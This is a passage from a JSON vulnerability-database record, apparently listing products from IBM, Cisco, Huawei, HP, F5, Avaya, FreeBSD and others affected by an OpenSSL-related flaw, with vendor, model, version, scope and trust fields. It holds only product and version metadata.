"2.2.4" }, { "model": "ecns610 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "documentum content server sp1", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025308" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.99" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.9" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "colorqube ps", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "85704.76.0" }, { "model": "oceanstor s6800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "manageone v100r002c10 spc320", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "svn2200 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "safe profile", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "db2 advanced workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.4" }, { "model": "big-iq security", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "eupp v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "security network intrusion prevention system gx6116", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.3" }, { "model": "uma-db v2r1coospc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management hf6", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "usg9300 usg9300 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600-" }, { "model": "espace u2990 v200r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "dsr-1000n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "svn5500 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0.1055" }, { "model": "tivoli netcool/system service monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp 4.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip webaccelerator", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "db2 developer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.6.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "isoc v200r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "tivoli storage flashcopy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "security network intrusion prevention system gx5108", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "db2 enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.7" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "idp series 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "logcenter v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dynamic system analysis", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "db2 express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "infosphere master data management server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "watson explorer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.4" }, { "model": "s7700\u0026s9700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s2600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl 1.0.1h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.10" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.2354" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.3" }, { "model": "enterprise manager", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "db2 purescale feature", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "big-iq security", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "db2 express edition fp7", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ftp server", "scope": "ne", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.3" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "point software check point security gateway r76", "scope": null, "trust": 0.3, "vendor": "check", "version": null }, { "model": "security information and event management ga", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.4.0" }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "tsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-1" }, { "model": "usg9500 v300r001c20sph102", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "asa cx context-aware security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified im and presence services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system gv200", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "wincc oa 3.12-p001-3.12-p008", "scope": null, "trust": 0.3, "vendor": "siemens", "version": null }, { "model": "elog v100r003c01spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.6" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "s5900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s6900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "fusionsphere v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tsm v100r002c07spc219", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x mobile lite for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "arx", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "espace iad v300r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server sp1 p28", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "big-iq cloud", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "security network intrusion prevention system gx7412-10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s2750\u0026s5700\u0026s6700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hyperdp v200r001c09spc501", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip webaccelerator", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "usg2000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.3" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "db2 workgroup server edition fp7", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "svn5500 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "agent desktop for cisco unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vdi communicator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.3" }, { "model": "oceanstor s5500t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.1" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace iad v300r001c07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "dsr-1000 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "db2 connect unlimited advanced edition for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.6.2" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "one-x mobile lite for iphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "documentum content server sp2 p16", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ip video phone e20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate products", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.4" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.9" }, { "model": "srg1200\u00262200\u00263200 v100r002c02hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "security network intrusion prevention system gx3002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "db2 connect enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "56000" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "messaging secure gateway", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.5" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77009.7" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s2750\u0026s5700\u0026s6700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.1" }, { "model": "uma v200r001c00spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s6800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "vdi communicator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace usm v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, 